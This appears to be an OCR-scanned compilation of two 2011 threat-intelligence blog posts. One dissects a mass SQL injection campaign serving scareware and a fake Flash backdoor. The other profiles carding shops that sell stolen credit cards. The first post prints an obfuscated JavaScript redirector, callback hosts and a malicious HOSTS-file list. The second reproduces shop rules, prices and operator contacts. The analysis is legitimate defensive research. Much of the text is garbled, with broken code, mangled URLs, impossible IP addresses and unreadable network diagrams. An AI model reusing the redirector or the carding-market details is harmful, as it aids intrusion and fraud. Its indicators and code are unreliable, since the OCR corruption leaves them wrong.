¢ [16]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 

¢ [17]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 

¢ [18]Dissecting the WordPress Blogs Compromise at Network Solutions 

e [19]Yet Another Massive SQL Injection Spotted in the Wild 

¢ [20]Smells Like a Copycat SQL Injection In the Wild 

¢ [21]Fast-Fluxing SQL Injection Attacks 

¢ [22]Obfuscating Fast-fluxed SQL Injected Domains 


This post has been reproduced from [23]Dancho Danchev’s blog. Follow him [24]Jon 
Twitter. 


1. http: //www.zdnet .com/blog/security/over—a-million-web-sites-affected-in-mass-sql-injection-attack/9662 
2. http://i.zdnet .com/blogs/mass_sql_injection_attack.png 

3. http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines. htm 

4. http: //ddanchev. blogspot .com/2009/04/massive-sql-injections-through-search.htm 

5. http: //blog.armorize.com/2011/10/httpjjghuicomurchinjs-mass- infection. htm 


6. http: //ddanchev. blogspot .com/2011/03/dissecting-massive-sql-injection-attack. html 


7. 
8. ttp://www.virustotal.com/file-scan/report.htm1?id=b204586cbac 160663736 1dd788b691f 342cb1c582d10690209a989 
9. hep: //pastebin. con/EEHVD6ux 


://ddanchev .blogspot.com/2010/07/sampling-malicious-activity-inside.htm 


://ddanchev .blogspot.com/2011/03/dissecting-massive-sql-injection-attack.htm 
://ddanchev .blogspot.com/2011/03/dissecting-massive-sql-injection-attack.htm 
://ddanchev .blogspot .com/2007/07/sql-injection-through-search-engines.htm 
://ddanchev .blogspot.com/2009/04/massive-sql-injections-through- search. htm 
://ddanchev . blogspot .com/2008/10/massive-sql-injection-attacks- chinese. htm 


://ddanchev .blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.htm 


17. http: //ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.htm 
18. http: //ddanchev.blogspot .com/2010/04/dissect ing-wordpress—blogs- compromise. htm 


. http: //ddanchev.blogspot .com/2008/05/yet-another-massive-sql-injection.htm 
. http: //ddanchev. blogspot . com/2008/07/smel1ls-like-copycat-sql-injection-in. htm 


. http: //ddanchev. blogspot. com/2008/05/fast-fluxing-sql-injection-attacks .htm 


22. http://ddanchev. blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected. htm 
23. http://ddanchev.blogspot.com/ 
. http: //twitter.com/danchodanche 


7.10.6 Dissecting the Ongoing Mass SQL Injection Attack (2011-10-20 23:36) 
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HTTP/1. 1 200 OK 
Date: Wed, 19 Oct 2011 11:24:05 GMT 


Server: Apache/2.2. 19 (FreeBSD) DAV/2 PHP/'S.3.6 mod_gel/2.2. 19 OpenSSL /0.9.8q 


Last- Modified: Wed, 19 Oct 2011 11:20:03 GMT 
Elag: “2b 1486e-ida3-4afa50577 lec" 

Accept Ranges: bytes 

Content-Length: 7592 

Commection: dose 

Content-Type: application /jievascriot 


var str=("78742", "78742", “7883S", "78843", "78827", "78848", °78843", "78764", "78793", "78764", °78771", "78336", "78848", "78348", “78844", *78790", "78779", 78779", “7885 


var temp="; 

var ga"; 

for ('=0; i<gtr length; i++){ 
ga=strli]-78732; 

temp =temp +String. fromCharCode (aq); 


} 
exal(ter); 


The [llongoing mass SQL injection attack, has already affected over a [2]million web 
sites. Cybercriminals performing [3]active search engines [4]reconnaissance have managed 
to inject a malicious script into ASP ASP.NET websites. 


bookfulacom 


bookgusa.com 


bookvila.com 


bookzula.com = 


RA 


A a 
3c. 146.185.2483 Ng 
Ba 


wwwfile-dl.com 
CNAME 
file-dl.com 


nbnjki.com 


nbnjki.com 


146.185,248.0/24 AS. AS43134 


From [5]client-side exploits to bogus Adobe Flash players, the campaign is active and ongoing. 
In this intelligence brief, we'll dissect the campaign and establish a direct connection between 
the campaign and last March’s [6]Lizamoon mass SQL injection attack. 


SQL injected domains - thanks to Dasient’s Tufan Demir for the ping: 
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nbnjki.com/urchin.js - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com 
jjghui.com/urchin.js - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com 
bookzula.com/ur.php - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com 
bookgusa.com/ur.php - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com 
dfrgcc.com/ur.php - Email: jamesnorthone@hotmailbox.com 

statsl.com/ur.php - 111.22.111.111 - Email: jamesnorthone@hotmailbox.com 
milapop.com/ur.php - Email: jamesnorthone@hotmailbox.com 
jhgukn.com/ur.php - Email: jamesnorthone@hotmailbox.com 
vovmml.com/ur.php - Email: jamesnorthone@hotmailbox.com 


bookvivi.com/ur.php - Email: jamesnorthone@hotmailbox.com 


Responding to 146.185.248.3 is also file-dl.com; bookfula.com and bookvila.com - Email: 
jamesnorthone@hotmailbox.com 


Detection rate for urchin.js: 

urchin.js - [7]Trojan.JS.Redirector - 17/42 (40.5 %) 

MD5 : 4387f9be5af4087d21c4b44b969a870f 

SHA1 : 8a47842ccf6d642043ee8db99d0530336eef6b99 


SHA256: 975e62fe1d9415b9fa06e8f826f7 76ef851bd030c2c897bc3fbee207519f8351 


The redirections take place as follows: 


¢ bookzula.com/ur.php -> www3.topasarmy.in/?w4q593n= - Email: 
bill.swinson@yahoo.com -> firstrtscanerrr.nu 


¢ nbnjki.com/urchin.js -> power-wfchecker.in/?1dlia916= - Email: bill.swinson@yahoo.com 


bill.swinson@yahoo.com has also been used to register the following scareware-serving 
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domains: 


uberble-safe.in 
uberate-safe.in 
best-jsentinel.in 
topantivir-foru.in 
personalscannerlg.in 
rideusfor.in 
hardbsy-network.in 
enablesecureum.in 
hardynaucheckerin 
best-jsentinel.in 
smartkihdefense.in 
smartaasecurity.in 
personal-scan-4u.in 
unieve-safe.in 
safe-solutionsoft.in 
hugeble-cure.in 
topsecuritykauu.in 
personalcleansoft.in 
powerscanercis.in 
topksfsecurity.in 
hard-antivirbjb.in 
strong-guardbxz.in 
smart-suiteguard.in 
thebestkrearmy.in 
smart-guardianro.in 
freeopenscanerpo.in 
best-networkqjo.in 
hard-antivirbjb.in 
smartantivir-scannerin 
most-popularsoftcontent.in 
bester-msecuriity.in 
doneahme.in 
strong-checkerwrt.in 
safepowerforu.in 
safe-securityarmy.in 
personal-bpsentinel.in 
personalcleansoft.in 
ostestsystemri.in 
saveinternet-guard.in 
just-perfectprotection.in 
firstholdermvq.in 
just-perfectprotection.in 
allcle-safe.in 
brawaidme.in 
uniind-safe.in 
moreaz-fine.in 
trueeox-safe.in 
safexanet.in 


3827 


personal-internet-foryou.in 


Ff ADOBE® FLASH® PLAYER 


An update to your Abode Flash Player is available 
Flash Player enhances your Web browsing expenence 
This wpdate incheses: 

* Ful ecreen, HD video playback 

* Cinematic special effects Mat bring Web experiences to Ife 


* Faster performance 


Updating takes under a minute on broadhand: no restart is required. 


(Download Now )| Don'tinsta | 


For the time being, the campaing is redirecting to a fake YouTube page enticing users 
into downloading a bogus Adobe Flash player in order to view the video. 


Detection rate for the bogus Adobe Flash player: 
scandisk.exe - [8]Backdoor:Win32/Simda.A - 8/43 (18.6 %) 
MD5 : fb4c93935346d2d8605598535528506e 

SHAI : Off7ccd785c0582e33c22f9b21156929ba7abaeb 


SHA256: b204586cbac1606637361dd788b691f342cb1c582d10690209a989b040dab632 


Upon execution the sample phones back to: 


209.212.147.141/chrome/report.html 
98.142.243.64/chrome/report.html 


update.19runs10q3.com - 65.98.83.115 
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The same phone back locations have been used in a variety of related malware - thanks to 
Kaspersky’s David Jacoby for the ping. For instance, in [9]this malware sample that’s also 
phoning back to the same URLs, we have active HOSTS file modification as follows: 


See related post: [10] Sampling Malicious Activity Inside Cybercrime-Friendly Search 
Engines 


www.google.com.=87.125.87.99; 
google.com.=87.125.87.103; 
google.com.au.=87.125.87.104; 
www.google.com.au.=87.125.87.147; 
google.be.=77.125.87.148; 
www.google.be.=77.125.87.149; 
google.com.br.=77.125.87.109; 
www.google.com.br.=77.125.87.150; 
google.ca.=77.125.87.152; 
www.google.ca.=77.125.87.153; 
google.ch.=77.125.87.155; 
www.google.ch.=77.125.87.158; 
google.de.=77.125.87.160; 
www.google.de.=77.125.87.161; 
google.dk.=92.125.87.123; 
www.google.dk.=92.125.87.160; 
google. fr.=92.125.87.154; 


www.google.fr.=92.125.87.134; 
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google.ie.=92.125.87.170; 
www.google.ie.=92.125.87.177; 
google.it.=92.125.87.173; 
www.google.it.=92.125.87.147; 
google.co.jp.=92.125.87.103; 
www.google.co.jp.=84.125.87.147; 
google.nl.=84.125.87.103; 
www.google.nl.=84.125.87.147; 
google.no.=84.125.87.103; 
www.google.no.=84.125.87.147; 
google.co.nz.=84.125.87.103; 
www.google.co.nz.=84.125.87.147; 
google.pl.=84.125.87.103; 
www.google.pl.=64.125.87.147; 
google.se.=64.125.87.103; 
www.google.se.=64.125.87.147; 
google.co.uk.=64.125.87.103; 
www.google.co.uk.=64.125.87.147; 
google.co.za.=64.125.87.103; 
www.google.co.za.=64.125.87.147; 
www.google-analytics.com.=64.125.87.101; 
www. bing.com.=92.123.68.97; 
search. yahoo.com.=72.30.186.249; 
www.search.yahoo.com.=72.30.186.249; 


uk.search. yahoo.com. =87.248.112.8; 
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ca.search.yahoo.com.=100.6.239.84; 
de.search. yahoo.com. =87.248.112.8; 
fr.search.yahoo.com. =87.248.112.8; 
au.search. yahoo.com. =87.248.112.8; 
ad-emea.doubleclick.net.=64.125.87.101; 


www.statcounter.com.=64.125.87.101; 


[11] The Lizamoon mass SQL injection connection 


The same email used to register the SQL injected domains jamesnorthone@hotmailbox.com 
has been used to register the Lizamoon mass SQL injection attack domains extensively profiled 
here - "[12]Dissecting the Massive SQL Injection Attack Serving Scareware". 


Related posts: 


¢ [13]SQL Injection Through Search Engines Reconnaissance 

¢ [14]Massive SQL Injections Through Search Engine’s Reconnaissance - Part Two 
¢ [15]Massive SQL Injection Attacks - the Chinese Way 

¢ [16]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 

¢ [17]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 

¢ [18]Dissecting the WordPress Blogs Compromise at Network Solutions 

¢ [19]Yet Another Massive SQL Injection Spotted in the Wild 

¢ [20]Smells Like a Copycat SQL Injection In the Wild 

¢ [21]Fast-Fluxing SQL Injection Attacks 

¢ [22]Obfuscating Fast-fluxed SQL Injected Domains 


This post has been reproduced from [23]Dancho Danchev’s blog. Follow him [24]Jon 
Twitter. 


1. http://www.zdnet .com/blog/security/over-a-million-web-sites-affected-in-mass-sql-injection-attack/9662 


2. http://i.zdnet.com/blogs/mass_sql_injection_attack. png 
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3. http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines.htm 

4. http: //ddanchev. blogspot .com/2009/04/massive-sql-injections-through-search.htm 
5. http: //blog.armorize.com/2011/10/httpjjghuicomurchinjs-mass-infection.htm 

6. http: //ddanchev. blogspot .com/2011/03/dissecting-massive-sql-injection-attack.htm 


7. 
8. ttp://www.virustotal.com/file-scan/report . html? id=b204586cbac 160663736 1dd788b691f 342cb1c582d10690209a989 
9. http: //pastebin. com/EEHVb6ux 


://ddanchev.blogspot.com/2010/07/sampling-malicious-activity-inside.htm 


://ddanchev .blogspot.com/2011/03/dissecting-massive-sql-injection-attack.htm 
://ddanchev .blogspot .com/2011/03/dissecting-massive-sql-injection-attack.htm 
://ddanchev .blogspot .com/2007/07/sql-injection-through-search-engines.htm 
://ddanchev .blogspot .com/2009/04/massive-sql-injections-through-search.htm 
://ddanchev .blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 


://ddanchev .blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.htm 


17. http: //ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.htm 


18. http: //ddanchev.blogspot .com/2010/04/dissecting-wordpress—blogs- compromise. htm 


. http: //ddanchev.blogspot .com/2008/05/yet-another-massive-sql-injection.htm 

. http: //ddanchev. blogspot . com/2008/07/smells-like-copycat-sql-injection-in. htm 

. http: //ddanchev. blogspot .com/2008/05/fast-fluxing-sql-injection-attacks .htm 
22. http://ddanchev. blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected. htm 


23. http://ddanchev.blogspot.com/ 
24. http://twitter.com/danchodanche 


7.10.7 Exposing the Market for Stolen Credit Cards Data (2011-10-31 02:07) 


What’s the [l]laverage price for a stolen credit card? How are [2]prices shaped within the 
cybercrime ecosystem? Can we talk about [3]price discrimination within the underground 
marketplace? Just how easy is to purchase stolen credit cards known as dumps or full dumps, 
nowadays? 


In this intelligence brief, | will expose the market for stolen credit cards data, by profil- 
ing 20 currently active and responding gateways for processing of fraudulently obtained 
financial data. 


Key summary points: 
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¢ Tens of thousands of stolen credit cards a.k.a. dumps and full dumps offered for sale ina 
DIY market fashion 


¢ The majority of the carding sites are hosted in the Ukraine and the Netherlands 
¢ Liberty Reserve is the payment option of choice for the majority of the portals 


¢ Four domains are using Yahoo accounts and one using Live.com account for domain reg- 
istration 


¢ Four of the domains are using identical name servers 


¢ Each DIY gateway for processing of fraudulently obtained financial data has a built-in 
credit cards checker or offers links to external sites performing the service 


¢ Several of the fraudulent gateways offered proxies-as-a-service, allowing cybercriminals 
to hide their real IPs by using the malware infected hosts as stepping stones 


The dynamics of the cybercrime ecosystem share the same similarities with that of a legit- 
imate marketplace. From seller and buyers, to bargain hunters, escrow agents, resellers 
and vendors specializing in a specific market segment, all the market participants remains 
active throughout the entire purchasing process. With ZeuS and SpyEye crimeware infections 
proliferating, it’s shouldn’d be surprising that the average price for a stolen credit card is 
decreasing. With massive dumps of credit card details in the hands of cybercriminals, obtained 
through [4JATM skimming and crimeware botnets, the marketplace is getting over-crowded 
with trusted propositions for stolen credit card details. 


a 


What used to be a market where over-the-counter trade was the primary growth factor, is 
today’s highly standardized marketplace with DIY online interfaces, allowing anyone to join 
and purchase stolen credit card details. Naturally, the vendors of dumps and full dumps 
are vertically integrating within the marketplace, and are offering additional services such 
as checkers for credit cards validity, and proxies-as-a-service - [5]compromised malware 
infected hosts - allowing a potential cybercriminal to opportunity to hide their IP while using 
the recently purchased credit cards data. 


How are prices shaped within this new and standardized market model offered commod- 
ity goods such as stolen credit cards, and is price discrimination for the stolen credit cards 
even feasible? The vendors are currently offered fixed prices for the majority of credit cards, 
with slight increases in the price of a stolen credit card, if the card is Premium. Bulk orders 
are naturally also considered as a growth factor the DIY interfaces, with slight discounts being 
offered for bulk orders. 


As far as [6]price discrimination is concerned, the concept is long gone, and has be- 
come the victim of this ongoing standardization of the market. The same goes for penetration 
pricing, as the vendors of stolen credit cards details are now enjoying a better underground 
market transparency into the fraudulent propositions of competing portals, helping them to 
set the prices more easily, without the need to lower the price in order to enter the market 
segment. 
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Let’s profile the 20 gateways for processing of fraudulently obtained financial data. 


Responding IPs, registered emails, name servers, ASs, associated ICQ numbers, geolo- 
cation of the hosting IP is as follows: 

ccmall.cc - 213.5.70.34 - Name_ server: TR1.ONLINESHOP.SU - Email: gwyl- 
hcfktm@whoisservices.cn - AS49544, INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS 
track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE 
trackstore.su - 46.21.148.26 - Email: rogersroy@yahoo.com - AS35017, SWIFTWAY-AS - 
HOSTED IN THE NETHERLANDS 

magic-numbers.cc - 91.213.175.89; 91.223.77.35 Name server: NS1.1000DNS.NET - Email: 
contact@privacyprotect.org - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE 
allfresh.us - 46.21.144.115 - Name server: YNS1.YAHOO.COM - Email: keikomiya- 
hara@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS 

freshstock.biz - 38.97.225.166; 69.175.73.184 - Name server - NS1.PIPEDNS.COM Email: 
ghmbfvntxs@whoisprivacyprotect.com - AS32475, SINGLEHOP , Inc. - HOSTED IN THE UNITED 
STATES 

bulba.cc - 91.223.77.254 - Name server: NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - 
AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE 

approven.su - 91.229.248.20 - Name server: dnsl.naunet.ru - Email: yurtan20@el.ru - 
HOSTED IN UKRAINE 

cv2shop.com - 72.20.12.205 - Name server: DNS1.NAME-SERVICES.COM - Email: wn- 
fxgjdg@whoisprivacyprotect.com - AS25761, STAMINUS-COMM - HOSTED IN THE UNITED 
STATES 

vzone.tc - 49.212.25.242 - Name server: dnsl.yandex.ru - Email: adamsnames@rrpproxy.net 
- AS9371, SAKURA-C SAKURA Internet - HOSTED IN JAPAN 

ccStore.ru - 91.220.101.200 - Name server: ns1.1000dns.net - Email: ccstoreru@yahoo.com - 
AS49704 - HOSTED IN THE NETHERLANDS 

dumps.cc redirects to privateservices.ws and trackservices.ws - 124.217.247.59 - Name 
server: NS1.IPSTATES.NET - Email: dumps.cc@domainsproxy.net - AS45839, PIRADIUS-AS 
PIRADIUS NET - HOSTED IN MALAYSIA 

privateservices.ws - 217.23.9.92 - Name server: nsl.servicedns.nl - AS49981, WorldStream 
AS Maasdijk - HOSTED IN THE NETHERLANDS 

perfect-numbers.cc - 91.220.101.75 - Name server: NS1.1000DNS.NET - AS49704, ADDOS-AS 
FOP Litvinenko Sergey Nikolaevich; icq: 605099359 - HOSTED IN THE NETHERLANDS 
mega4u.biz - 178.162.174.71 - Name server: NS1.FREEDNS.WS - Email: persiks@online.ua - 
AS28753, LEASEWEB-DE - HOSTED IN GERMANY 

accesslitd.ru - 911.213.175.167 - Name server: ns14.zoneedit.com - Email - admin@accessltd.ru 
- AS6849, UKRTELNET JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - HOSTED IN 
UKRAINE 

pwnshop.cc - 77.79.13.209 - Name server: NS1.AFRAID.ORG - AS16125, DC-AS UAB - HOSTED 
IN LITHUANIA 

bestdumps.su - 91.213.175.57 - Name_ server: ns1.1000dns.net - Email: best- 
dumpssu@live.com ICQ : 619429330 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED 
IN UKRAINE 

mycc.su - 188.93.17.180 - Name server: nsl.deltahost.com.ua - Email: admin@mycc.su - 
AS49505, SELECTEL Ltd. - HOSTED IN RUSSIA 

bestdumps.biz - 195.3.145.87 - Name server: NS1.BESTDUMPS.BIZ - Email: ad- 
min@bestdumps.biz - AS50244 - HOSTED IN LATVIA, Associated email: bdsupport@jabber.org, 
Associated ICQ: 655584 

dumpshop.bz - 217.23.9.93 - Name server: nsl.servicedns.nl - Email: con- 
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tact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS 
cardshop.bz - 217.23.9.67 - Name_ server: nsl.servicedns.nl - Email: con- 
tact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS 


Let’s now take an inside view into each and every of the above-profiled gateways. 


_accesslitd.ru 

Accessitd.ru is currently offering an inventory of 39328 U.S based stolen credit card details 
for just $2.10 each, followed by another inventory of 342 U.K based credit cards for $9 each, 
and 108 Japanese based credit cards for $8 each, with another dump of 293 Canadian credit 
cards for $7 each, and 198 Australian based credit cards for $8 each. 


Home | Search Cards! Checkout | My orders | Balance: So.00 | Support | Account | Service Rules | Help | Logou 


Load funds: 
Liberty Reserve:[ | Pay] 


Statistic: 
Out of stock. 
-_> 
Cvv 

Country Price Qt. 
Ag $10,00 i 
Au $8,00 12 
Be $10,00 i 
Br $7,00 $3 
Ca $7,00 6 
Cn $10,00 2 
Co $10,00 ry 
Es $10,00 1 
Fr $10,00 2 
Gb $9,00 1 
In $5,00 7 
Kr $8,00 1 
Mx $10,00 2 
Nl $10,00 2 
Nz $7,00 i 
Rj $10,00 2 
Sa $10,00 i 
Tr $6.00 19 
Uk $9.00 122 


According to the service - "We accept Liberty Reserve only.Refund on your wallets is not 
possible." 


Moreover, here’s how the service operates based on the Service Rules: 

"To check the card is integrated into the platform checker CCChecker, currently the best 
checker, not only in our opinion. Replacement cards are only based on the result of this 
checker. Check Card is available immediately after order payment, in the section My Orders. 
To check, click "Check". Cards checking in for a few seconds. Button "Check" - available within 
20 minutes after purchase. Check Card - a paid service, which costs $ 0.3, if the card is not 
valid - the cost of cards back to your 

account automatically. 


Replacement card can only be made in the automatic mode. If checker dont working, 
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for replace need screens your checker in the Support section with a description of the problem. 
These tickets will only be considered if they contain the results of your test, not a "paid for 
Skype, did not work, replace". We do not care where and how you use the material, loading 
support extra information is needed.We will check the card manually, and if any parameter is 
not correct to make you refund. Sorting: 


Our shop is available sorted by the following parameters: 
1. BIN ( Multiple) 

2. State (Multiple) 

3. City (Multiple) 

4. Zip (Multiple)" 


_Domain reconnaissance 


-91.213.175.167 ns % 


A 


91.213.175.0/24 AS6849 


us "519zoneeditcom 4 216.227.210.10 NET 216.227.210.0/24 AS. aS15244 


PTR 
ru div00012 lunarservers.com 


NS 

PTR. nsl4zoneeditcom 
209.126.137.108 “A 

NET 


209.126.128.0/17 AS. as10439 


accesslitd.ru - 911.213.175.167 - Name server: ns14.zoneedit.com - Email - admin@accessltd.ru 
- AS6849, UKRTELNET JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - HOSTED IN 
UKRAINE 


_AllFresh.us 

AllFresh.us is yet another DIY shop for purchasing stolen credit card details, all fresh as the 
name says. 

On 2011/08/04 the service issued updates for "updated US Amex, Discover fresh and good", 
followed by another update on the next day, this time advertising "updated more cvv Franche 
new and good today." 


The price for a stole card number is static and is $6 per credit card. 
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2011-08-05 18:38:55, Updated more ccv oe new and good today 


Dear ! customers we updated ccv FRANCE veer 


2011-08-04 19:02:39, updated 2h amex , discover — and GOOD 


Dear Customers, we update US amex and discover very good on Agent Admin 
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ITEMS: 0 
ITEMS: 0$ 


CheckOut 


Name Expire Country 


4 nn AB — TA6L7 = 6S. | Buy > 
4 Canada BC NANAIMO =» VOT2K3. 6S | Buy - 
4 Canada NB SAINTJACQUES E7B1R7 6S | Buy > 
4 Canada NS HALIFAX B3M1C5 6S | Buy - 
4 Canada NS HALIFAX B3M2EB 6S | Buy - 
4 Canada NS HALIFAX  -BSM3LB_ «6S | Buy - 
4 Canada NS HALIFAX  B3N3L2_ 6S | Buy - 
4 Canada NS STI = B321G7 6S) | Buy - 
4 Canada NS TIMBERLEA = BSTIES. «6S | Buy 


_Domain reconnaissance 
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yns1 yahoo.com 
PTR 


ue us 98.136.43.32 NET 98.136.40.0/21 AS. 4$36752 


ns8.san yahoo.com 
s 


, *621144.115 NET 46.21.144.0/20 AS. 4S$35017 
ug SS2YANCO.COM “FR > 98.139.247.192 MEL 98.139.128.0/17 AS aS26101 
LK ns 59.sanyahoo.com ae tll 1e100.net 
allfresh.us > ux ‘ 
~ aspmx5.googlemail.com & 74.125,157.27 NEL 74.125.156.0/23 
Lt 
aspmx.google.com > 74.125,113.27 NET 74.125,112.0/23 
PTR 
ww-in-27,1e100,net oui it-127.1eL00.net 
Ux 
altl.aspmx|.google.com & 209.95.143.27 — NET 209.85,142.0/23 a 
ux as AS15169 
aspmxé.googlemail.com 4 209.85.229.27 NET 209.85.228.0/23 ASI 
a PTR 
ey-in-t27.1¢100.net ww-in-127.1e100.net 
ux eT A 
alt2.aspmx..google.com & 74.125.79.27 NEL 74.125.78.0/23 
ux 
aspmx3.googlemail.com $ 74.125.127.27 <g—?B pz-in-27.1e100.net 


NET 
74.125.126.0/23 


allfresh.us - 46.21.144.115 - Name server: YNS1.YAHOO.COM - Email: keikomiya- 
hara@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS 


_Approven.su 

Approven.su is a relatively more advanced DIY shop for purchasing of stolen credit card details, 
due to to its advanced search options, allowing cybercriminals an easier way for searching 
into the the dumps/full dumps of stolen credit card details. 


The most recent annoucement at Approven.su says "Sumer Jam: 8 new bases - Geor- 
gia2, California3, Pennsylvania3, Puerto Rico, California4, Texas4, Virginia, California5". 


The price for a stolen credit card is $10, with Platinum cards going for $15. 
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Sumer Jam: 8 new bases - Georgia?, California3, Pennsylvania3, Puerto_Rico, California4, 
Texas4, Virginia, CaliforniaS 


Ticket support system now available. Stop spimming me on icq and use the ticketing with common 
sense. 


New_Jersey2 base moved to free checking, due to poor results. Contact support If you have more 
problems with it. 


Surprise update! Check Base information! 
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MAT BANK 


USAA FEDERAL SAVINGS BANK 


_Domain reconnaissance 


91,229.248.20 NET 91.229.248.0/24 AS. AS3.537 
a 
uP. su 
. 
dns2.naunetru -pf_—S 193.227.241.60 
NS PTR A NET 
PTR. dnsi.naunet.ru 193.227.240.38 NET 193.227.240.0/23 AS. 4S35718 
193.227.240.37 “A NET. 


approven.su - 91.229.248.20 - Name server: dnsl.naunet.ru - Email: yurtan20@el.ru - 
HOSTED IN UKRAINE 


BestDumps.biz 


BestDumps.biz doesn’t allow newly registered visitors the opportunity to search across its 
database of stolen credit card details, unless they pay $50 using Liberty Reserve. 
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Vv, 
A 


BEST 


LOGIN 


a 
— 


To register please write to 
bdsupport@jabber.org or 655584 


Ne , 
Welcome Current balance: 


Shopping Cart: $0 
Total cards: 0 


Validation 


You are seconds away to have full access to this site. 


Notes: 


@ If your accunt ss not activated wthin 24 hours, your account will be removed. 


@ If the amount sent is different than $50 your account will not be activated. 


Add Liberty 


mums Reserve 


Activate Accour, 


OB Internat | Dentactad Mada Cin 
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_Domain reconnaissance 


_ 195.3.145.87 


NET 195,3.144.0/22 


AS. as41390 


up biz 
. mail. bestdumps.biz 
x 


Le 
bestdumps.biz > NS. nsi.bestdumps.biz 
< ee 


NS 


PIR 


nsl.domain.com 4 72.5.54.12 nsl. hostinap.sea.dotsternet 


NS NET 
72.5.48.0/20 5 


ns2.bestdumps.biz AS14744 


NET 
NS 


PTR 


ns2.domain.com & 6725.54.13 ns2.hostinap.seadotsternet 


bestdumps.biz - 195.3.145.87 - Name server: NS1.BESTDUMPS.BIZ - Email: —ad- 
min@bestdumps.biz - AS50244 - HOSTED IN LATVIA, Associated email: bdsupport@jabber.org, 
Associated ICQ: 655584 


_Bulba.cc 


Bulba.cc offers a Checker for stolen credit cards. The most recent announcement is "UP- 
DATE ADDED 1000 MEXICO RARE! FRESH! 95 % VALID!!! Hurry up to load the account". 


The service advertised itself as follows: 

"Hello my name is Bulba. | am official reseller of TRACK2.NAME service. Bulba.cc opened 
because track2.name closed registration and don’t accept new customers. We don’t have 
any specific rules. Our only rule is “we don’t replace bad dumps". That means we don’t 
replace them at all and we don’t have replacement policy. Don’t ask about it in any case! 


We accept Libery Reserve, WU, MG, Bank Transfer (NEW) without any fees. Minimum 
for payment by LR - 10 $, WU, MG - 500 $, Bank Transfer - 500 $. Also we give 10 % bonus of 
money to all purchases. 


Our bases: SALES - track2, 50 % valid, alot dumps! Very cheap $7 per one! DATABASE9 - 


TRACK1+TRACK2(90 %) + TRACK2(10 %) only! 80 % valid, FRESH. NEW DATABASE, TRACK 2 
only, 95 % valid, FRESH! NEW!" 
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_Domain reconnaissance 


NET 195.161.0.0/16 AS. ase342 
195.161.113.218 
A 
89.108.120.0/22 AS. AS43146 
NET. 
PTR 
ns1.nameselt.com 4 989.108.122.149 PTR 
NS A dns5.nameselt.com 
qa 91.223.77.254 NET 91 223.77.0/24 AS. as6a4g 
. " 
ce eg, 188-220:32.0120 AS49189 
NS 
ns2.nameself.com 4S 188.120.40.166 <g—P™ dns3.nameselt.com 
A 
77.221,159.237 NET 77.221.144.0/20 AS. as30968 
PIR 


dns4.nameself.com Sh 77.221.159,234 


bulba.cc - 91.223.77.254 - Name server: NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - 
AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE 


_CardShop.bz 
CardShop.bz is yet another DIY interface for purchasing stolen credit cards data (dumps/full 
dumps). The general rules of the site are as follows: 


2.1.1) All calculations on a site and its services - automatic 
2.1.2) Minimum funding amount on a site 10 $ that equals to 50 credits 
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2.1.3) Period of validity of credits is 1 month (under the additional oral agreement term can 
be increased). In a case if you had not time to spend all credits, it is possible to make fund of 
your account and credits will automatically be restored 

2.1.4) Refund for not used credits - 1S NOT POSSIBLE 

In order to avoid conflict situations, please check information that you need before funding 
account 


The Rules of service ONLINE sale CC/DUMPS reads: 


"2.2) Rules of service ONLINE sale CC/DUMPS 

2.2.1) Return of credits for purchased CC/Dumps which have been checked before purchase 
and have status VALID - IS NOT POSSIBLE 

2.2.1) Return of credits for purchased CC/Dumps which have been checked in 1 hour after 
purchase through the link ’Check’ and having status VALID - 1S NOT POSSIBLE 

2.2.2) Return of credits for purchased invalid CC/Dumps (DECLINE/HOLD CALL/PICKUP) which 
are not checked before purchase, is possible only within 24 hours after the order. After 24 
hours any claims on return of credits are not accepted 

2.2.3) You will not be charged for invalid CC/Dumps if you checked it instant or in 1 hour and 
credits will be refunded automatically. You will be charged only for CC/Dumps checking even 
if CC/Dumps is invalid 

2.2.4) We do not guarantee limits and amounts on CC/Dumps 


2.3) Rules of service ONLINE Check CC/Dumps 

2.3.1) Status Valid, means that at the moment of check CC/Dump was Approved 

2.3.2) Status Declined, means that at the moment of check CC/Dump was Decline/Pickup/Hold 
Call 

2.3.3) Claims on checked DUMP/CC are not accepted. 


2.7) Rules of other services on site CardShop will be added in this agreement later 

3) Prices and Tariffs 

3.1.1) 1 credit is accepted to a unit of account on site CardShop. Initially 1 credit = 1 $. The 
price for 1 credit can change according to tariffs for funding. Tariffs could be found in Tariff 
section at site 

3.1.2) Administration CardShop reserves the right to itself at any moment to change tariffs. 
You agree periodically check tariffs on site CardShop to learn about possible changes in them" 


The is currently offering 33903 U.S based stolen credit cards for sale. The web site is 
also offering Proxies for sale - compromised malware infected hosts- where the price is 0.3 $ 
per proxy. Next to the inventory of stolen credit cards and the proxy service, the web site is 
also offering batch checking for the validity of the stolen credit cards, and is also performing 
